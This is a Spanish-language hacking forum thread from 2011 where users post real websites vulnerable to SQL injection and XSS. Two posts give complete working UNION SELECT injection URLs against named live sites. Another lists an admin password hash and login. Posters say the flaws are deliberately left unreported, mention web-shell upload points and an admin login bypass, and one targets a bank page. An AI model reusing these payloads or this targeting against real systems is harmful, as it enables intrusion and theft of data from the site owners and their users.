• Reporte de bugs en webs

  • Aquí se discutirán las principales técnicas usadas para auditar las aplicaciones web, técnicas como SQL Injection, XSS, CSRF, etc.
Aquí se discutirán las principales técnicas usadas para auditar las aplicaciones web, técnicas como SQL Injection, XSS, CSRF, etc.
 #293482  por MichBukana
 09 May 2011, 16:01
Web: [ Debe registrarse para ver este enlace ]

Bug: [ Debe registrarse para ver este enlace ]

[ Debe registrarse para ver este enlace ]

Descubridor: Er MichyBukana
no me permitía utilizar el < por lo que no pude hacer un XSS mas gracioso jeje.

Salu2!
 #312604  por CyRuX
 08 Ago 2011, 09:42
Web:

[ Debe registrarse para ver este enlace ]
[ Debe registrarse para ver este enlace ]
[ Debe registrarse para ver este enlace ]
[ Debe registrarse para ver este enlace ]
[ Debe registrarse para ver este enlace ]
[ Debe registrarse para ver este enlace ]
[ Debe registrarse para ver este enlace ]
[ Debe registrarse para ver este enlace ]
[ Debe registrarse para ver este enlace ]
[ Debe registrarse para ver este enlace ]
[ Debe registrarse para ver este enlace ]
[ Debe registrarse para ver este enlace ]
[ Debe registrarse para ver este enlace ]
[ Debe registrarse para ver este enlace ]
[ Debe registrarse para ver este enlace ]
[ Debe registrarse para ver este enlace ]
[ Debe registrarse para ver este enlace ]
[ Debe registrarse para ver este enlace ]
[ Debe registrarse para ver este enlace ]
[ Debe registrarse para ver este enlace ]
[ Debe registrarse para ver este enlace ]
[ Debe registrarse para ver este enlace ]
[ Debe registrarse para ver este enlace ]
[ Debe registrarse para ver este enlace ]

=============================================

Bug:

[ Debe registrarse para ver este enlace ] ... ----c:(web encontrada pass:aa844643126fb6fedcd012933b4ae494 login;admin. panel--C:[ Debe registrarse para ver este enlace ]
[ Debe registrarse para ver este enlace ] ... ----c:(web con 3 bases de datos y se encontro el el user y pass pero no se pudo decifrar)
[ Debe registrarse para ver este enlace ] ... -C:(tablas encontradas pero hash no se puede crackear)
[ Debe registrarse para ver este enlace ] ... ----c:(web con todas las tablas pero no se encontro el login ni las pass..)
[ Debe registrarse para ver este enlace ] ... ----c:(web con todas las tablas pero no se encontro el login ni las pass..)
[ Debe registrarse para ver este enlace ] ... ----c:(web con todas las tablas pero ninguna interesante.)
[ Debe registrarse para ver este enlace ]'
[ Debe registrarse para ver este enlace ]'
[ Debe registrarse para ver este enlace ]? ... ---------C: sacadas todas las tablas menos las del admin..!
[ Debe registrarse para ver este enlace ]'
[ Debe registrarse para ver este enlace ] ... ?EventID='
[ Debe registrarse para ver este enlace ]'
[ Debe registrarse para ver este enlace ]'
[ Debe registrarse para ver este enlace ] ... ,5,6,7,8--
[ Debe registrarse para ver este enlace ]'
[ Debe registrarse para ver este enlace ]'
[ Debe registrarse para ver este enlace ]'
[ Debe registrarse para ver este enlace ]'
[ Debe registrarse para ver este enlace ]'
[ Debe registrarse para ver este enlace ]'
[ Debe registrarse para ver este enlace ] ... ,1,2,3,4,5
[ Debe registrarse para ver este enlace ]'
[ Debe registrarse para ver este enlace ]'
[ Debe registrarse para ver este enlace ]'

=============================================
Metodo:
SQL,XSS
=============================================
Descubridor:
CyRuX
=============================================
Comentarios:
Ninguna fue reportado..!¬¬
pero todas esta con los datos necesario. Login: y Pass:
algunas tienen uplaod para la introduccion de 1 web-Shell
 #312728  por rhector123
 08 Ago 2011, 22:52
wow !! eres un Maniaco CyRuX jajaj nada solo una Pequeña Broma Muy Buen Aporte CyRuX BUeno aki vamos :

Web: [ Debe registrarse para ver este enlace ]

Bug: [ Debe registrarse para ver este enlace ]%

Panel: [ Debe registrarse para ver este enlace ]

Descubridor: rhector123

Metodo: SQL

Comentarios: Bueno reportado 5 veces sin respuestas Por eso lo hago Publico

otra cosa mas hay un bug mas, se puede saltar el logeo xD del admin
el administrador deberia poner mas interes en su seguridad xD bueno eso es todo.

un saludo Atte By rhector123
 #312795  por CyRuX
 09 Ago 2011, 06:31
Web:
[ Debe registrarse para ver este enlace ]
Bug:
Código: [ Debe registrarse para ver este enlace ]
http://www.estrellasorientales.com.do/noticias.php?id=-1+union+select+all+1,replace%28group_concat%28table_name%29,0x2C,0x3C62723E%29,3,4,5,6,7+from+information_schema.tables--
Panel:
[ Debe registrarse para ver este enlace ]
Metodo:
SQL

Comentario:
No se ah reportado..! pondria los datos del admin
pero creo que seria demasiado..!

Network:iranserv Server
rc.iranserv.com
Channel : #iberoamerica
#Anonymous
#Honduras
 #312818  por CyRuX
 09 Ago 2011, 08:35
WEB:
[ Debe registrarse para ver este enlace ]

BUG:
Código: [ Debe registrarse para ver este enlace ]
http://www.cac-acc.org/news.php?id=-1+union+select+1,replace%28group_concat%28table_name%29,0x2C,0x3C62723E%29,3,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables--
Panel:
NO encontrado..!

Metodo:
SQL!

Descubridor:
CyRuX

Comentario:
No reportado..! Ni pienso hacerlo..!¬¬

=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=
Network:iranserv Server:rc.iranserv.com
Channel : #iberoamerica
#Anonymous
#Honduras
 #324032  por KHC
 10 Oct 2011, 04:14
Banco de Blangadesh:

[ Debe registrarse para ver este enlace ]( >org/aboutus/dept/dept_deta‚ils.php?callfrom=tababoutus‚&dept_id=74

PD: tiene errores logicos, y muy obvios para uqe no metan las manos donde no los kiddies!
  • 1
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14